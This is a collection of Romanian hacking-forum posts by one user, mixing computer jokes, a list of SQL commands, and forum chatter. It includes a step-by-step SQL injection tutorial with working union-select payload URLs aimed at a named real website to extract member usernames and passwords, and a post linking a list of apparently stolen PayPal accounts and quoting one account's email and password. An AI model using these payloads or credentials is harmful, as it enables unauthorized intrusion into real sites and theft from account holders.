ZeroCold

Nu cred ca in zilele noastre ar fi o asa mare problema copyright incat sa ascundem muzica in poze....poate undeva in viitor..cine stie.. Si nu cred ca ar downloada cineva fisierele alea gif, in primul rand pt ca nu ar sti sa le foloseasca (unii) decat sa se uite la ele si in al doilea rand unele persoane pot sa sustina ca sunt virusi si sa paraseasca imediat pagina Nu cred ca ai avea succes cu un astfel de site. Si in plus pe langa piraterie cred ca ai putea fi acuzat si de inselaciune ( nu cunosc legile, mi-am dat doar cu parerea )

Sotia: Ai facut cumparaturile? Sotul: Bad command or filename. Sotia: Dar te-am rugat de dimineata... Sotul: Syntax Error. Abort? Sotia: Nici macar noul televizor? Sotul: Variable not found... Sotia: Bine, da-mi cartea de credit, merg eu la cumparaturi... Sotul: Sharing Violation. Access denied! Sotia: Tu vorbesti serios, glumesti sau incerci sa ma enervezi? Sotul: Too many parameters... Sotia: Cum de m-am maritat eu tocmai cu tine? Sotul: Data type mismatch. Sotia: Dar salariul cind il iei? Sotul: File in use... Try later. Sotia: Ma faci sa ma intreb... ce insemn eu pentru tine? Sotul: Unknown Virus... ========================================= Calculatorul meu mergea ca naiba. De aceea, l-am sunat pe Gigel, pustiul de 11 ani care locuieste vizavi si al carui dormitor arata ca centrul de control de la NASA si l-am chemat pana la mine.. Gigel a butonat cam un minut si totul s-a rezolvat ca prin farmec. Inainte sa plece, l-am intrebat: - Care era problema? - O eroare "ID ten T", mi-a raspuns. Nu voiam sa par ignorant, dar nici nu voiam sa las lucrurile nelamurite. - O eroare "ID ten T"? Ce-i aia? Explica-mi mai mult, poate ca mai apare si cand nu esti tu acasa... Gigel s-a strambat: - Chiar nu stii ce inseamna? - Nu, i-am raspuns. - Scrie-o pe hartie si-ti vei da seama imediat. Si a iesit repede. Asa ca am scris-o pe hartie: I D 1 0 T. Si-mi era simpatic, afurisitul! ============================================= Tata, cum am am aparut eu pe lume?? Tata zice: - Baah fiule, cred ca intr-o zi tot ai sa afli! Hai sa-ti spun pe limba ta. Pai, eu si cu maica-ta intr-o zi am intrat intr-o camera de chat a Yahoo-ului. Am aranjat apoi o intilnire via e-mail cu maica-ta si ne-am intilnit intr-un internet cafe virtual. Ne-am strecurat intr-o camera privata, unde maica-ta a fost de acord cu un download din hard-ul meu. Imediat ce eram gata de upload, am descoperit ca nici unul dintre noi nu folosise firewall-ul si fiindca deja era prea tirziu sa dam delete, noua luni mai tirziu a aparut un mic popup care a tipat din toti rarunchii: - You`ve Got Mail !!!!

eram sigur :D:D ps: pana se inventeaza puteti sa incercati cu add

Cand se face extragerea aia??? sau doar faci misto de noi si la urma ne spui ca ai ramas fara ele sau le-ai dat in alta parte

Azi pe mess . Altu care se joaca cu programele de two lei

Am editat tutorialul. Acum este bun???

:D:D bv nemessis!

neaa, zero, jilava mod

:D:D welcome to rst man!

speak romana "omule"...or english

Nus ce sa zic welcome sau godbye :D:D

aleg 6 ........pt ca nu a mai fost ales

a incercat cineva conturile astea? http://www.coiciu.go.ro/lrry/paypaluri.txt ? am gasit unu care merge da ii falit ,(blaqboks@hotmail.com#3333scalp) a gasit cineva money pe vreun cont ???

Saracu.....are 2 warnuri pe hackpedia, nu cred ca le-a luat de buna purtare si nici bataia care si-o lua cand era mic nu cred ca era degeaba, facea el ceva

SQL commands ABORT -- abort the current transaction ALTER DATABASE -- change a database ALTER GROUP -- add users to a group or remove users from a group ALTER TABLE -- change the definition of a table ALTER TRIGGER -- change the definition of a trigger ALTER USER -- change a database user account ANALYZE -- collect statistics about a database BEGIN -- start a transaction block CHECKPOINT -- force a transaction log checkpoint CLOSE -- close a cursor CLUSTER -- cluster a table according to an index COMMENT -- define or change the comment of an object COMMIT -- commit the current transaction COPY -- copy data between files and tables CREATE AGGREGATE -- define a new aggregate function CREATE CAST -- define a user-defined cast CREATE CONSTRAINT TRIGGER -- define a new constraint trigger CREATE CONVERSION -- define a user-defined conversion CREATE DATABASE -- create a new database CREATE DOMAIN -- define a new domain CREATE FUNCTION -- define a new function CREATE GROUP -- define a new user group CREATE INDEX -- define a new index CREATE LANGUAGE -- define a new procedural language CREATE OPERATOR -- define a new operator CREATE OPERATOR CLASS -- define a new operator class for indexes CREATE RULE -- define a new rewrite rule CREATE SCHEMA -- define a new schema CREATE SEQUENCE -- define a new sequence generator CREATE TABLE -- define a new table CREATE TABLE AS -- create a new table from the results of a query CREATE TRIGGER -- define a new trigger CREATE TYPE -- define a new data type CREATE USER -- define a new database user account CREATE VIEW -- define a new view DEALLOCATE -- remove a prepared query DECLARE -- define a cursor DELETE -- delete rows of a table DROP AGGREGATE -- remove a user-defined aggregate function DROP CAST -- remove a user-defined cast DROP CONVERSION -- remove a user-defined conversion DROP DATABASE -- remove a database DROP DOMAIN -- remove a user-defined domain DROP FUNCTION -- remove a user-defined function DROP GROUP -- remove a user group DROP INDEX -- remove an index DROP LANGUAGE -- remove a user-defined procedural language DROP OPERATOR -- remove a user-defined operator DROP OPERATOR CLASS -- remove a user-defined operator class DROP RULE -- remove a rewrite rule DROP SCHEMA -- remove a schema DROP SEQUENCE -- remove a sequence DROP TABLE -- remove a table DROP TRIGGER -- remove a trigger DROP TYPE -- remove a user-defined data type DROP USER -- remove a database user account DROP VIEW -- remove a view END -- commit the current transaction EXECUTE -- execute a prepared query EXPLAIN -- show the execution plan of a statement FETCH -- retrieve rows from a table using a cursor GRANT -- define access privileges INSERT -- create new rows in a table LISTEN -- listen for a notification LOAD -- load or reload a shared library file LOCK -- explicitly lock a table MOVE -- position a cursor on a specified row of a table NOTIFY -- generate a notification PREPARE -- create a prepared query REINDEX -- rebuild corrupted indexes RESET -- restore the value of a run-time parameter to a default value REVOKE -- remove access privileges ROLLBACK -- abort the current transaction SELECT -- retrieve rows from a table or view SELECT INTO -- create a new table from the results of a query SET -- change a run-time parameter SET CONSTRAINTS -- set the constraint mode of the current transaction SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session SET TRANSACTION -- set the characteristics of the current transaction SHOW -- show the value of a run-time parameter START TRANSACTION -- start a transaction block TRUNCATE -- empty a table UNLISTEN -- stop listening for a notification UPDATE -- update rows of a table VACUUM -- garbage-collect and optionally analyze a database

coliva moca

scuze, dar nu ai dreptate, nu m-am uitat.poti sa crezi ce vrei

folosesc from+information_schema.columns+where+table_name= char() ?

Poi notiunea de filtrare... Aici from+information_schema.columns+where+table_name="membri" ...cum sa explic....filtreaza datele si le da doar pe acelea care se afla in tabelul membri..nu?

Am facut acest tutorial pentru a invata, invat mai bine cand fac tutoriale si exersez de cat atunci cand tocesc. Daca nu este bun, aruncatil la cos.

Parca tu ai stiut la inceput Puteai sa spui si tu...ma, nu e bine acolo, fa asa.....da na ce sa faci....asta-i rst...so...shh ca ne luam warn/ban. Acum sunt la inceput, e normal sa mai gresesc. ps: facem pariu ca jumatate stiu ce face

Tutorial SQL Injection 1.Ne alegem tinta: Pentru a o gasi mai usor cautam pe google: ext:php inurl:articole.php Eu am ales arts.org.ro Asa......intram la "Noutati" si alegem un articol de acolo, eu l-am ales pe primul. Linkul arata asa: http://arts.org.ro/pagini/noutati.php?art=59 2.Verificam daca siteul este vulnerabil: Punem ‘ la sfarsitul linkului. Linkul arata asa: http://arts.org.ro/pagini/noutati.php?art=59’ Daca nu se intampla nimic inseamna ca nu este vulnerabil, daca primim eroare inseamna ca este vulnerabil. In cazul nostru am primit eroare, deci este vulnerabil: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 - Query was: SELECT * FROM noutati WHERE id=59' 3.Cautam numarul de coloane: Folosim order by: Prima data punem order by 1. http://arts.org.ro/pagini/noutati.php?art=59+order+by+1 Nu primim eroare, inseamna ca are mai mult de o coloana Punem order by 10 http://arts.org.ro/pagini/noutati.php?art=59+order+by+10 Apare eroarea, deci are mai putin de 10. Punem order by 9, apoi order by 10, pana ne dispare eroarea, in cazul nostru eroarea a disparut la order by 7: http://arts.org.ro/pagini/noutati.php?art=59+order+by+7 Inseamna ca are 7 coloane. 4.Cautam coloanele vulnerabile: Tocmai am aflat ca are 7 coloane, acum cautam coloanele vulnerabile. Punem union all select: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,2,3,4,5,6,7 Undeva pe pagina vor aparea coloanele vulnerabile, in cazul nostru au aparut coloanele 2,3 si 4. 5.Aflam versiunea MySQL: Pentru a afla versiunea MySQL punem in loc de cifrele aparute anterior pe pagina, @@version: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,@@version,3,4,5,6,7 Versiunea este : 5.0.45-log Observam ca a aparut in locul cifrei inlocuite. Daca versiunea este mai mare sau egala cu 5 atunci putem folosi information_schema, daca nu atunci trebuie sa ghicim totul. 6.Cautam tabelul unde se afla username si password: Punem table_name: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables Putem cauta pe rand folosind limit: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+1,1 http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+2,1 http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+3,1 Si tot asa pana cand gasim tabelul dorit sau folosim group_concat: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7+from+information_schema.tables Folosind group_concat(table_name) primim toate tabelele separate prin virgula. In cazul nostru tabelul este: “membri” 7.Cautam coloanele unde se afla parola si usernameul: Dupa ce am gasit tabelul dorit (ceva de genu: admin, users, members..etc) cautam coloanele, ele trebuie ar trebui sa aiba nume precum: pw, password, pass, user,username…etc La fel ca si tabelele, le putem cauta pe rand cu limit: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+1,1 http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+2,1 http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+3,1 si tot asa…sau putem folosi group_concat(column_name): http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,group_concat%28column_name%29,3,4,5,6,7+from+information_schema.columns In cazul nostru coloanele sunt: username si password 8.Obtinem user si pass: Putem vedea user si pass pe rand: User: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,username,3,4,5,6,7+from+membri Pass: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,password,3,4,5,6,7+from+membri Daca avem doua sau mai multe coloane vulnerabile putem user pe una si pass pe alta: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,username,password,4,5,6,7+from+membri Sau putem folosi “concat”: http://arts.org.ro/pagini/noutati.php?art=-59+union+all+select+1,concat%28username,0x3a,password%29,3,4,5,6,7+from+membri Cam atat, sper ca de data asta sa fie bun tutorialul… Ps: Nu ma fac responsabil pentru daunele provocate de acest tutorial, este doar pentru scop informativ.

welcome borcea...

Sooper siteu

dupa ce gasesti vulnerabilitatea o exploatezi. uite aici un tutorila despre sql bafta!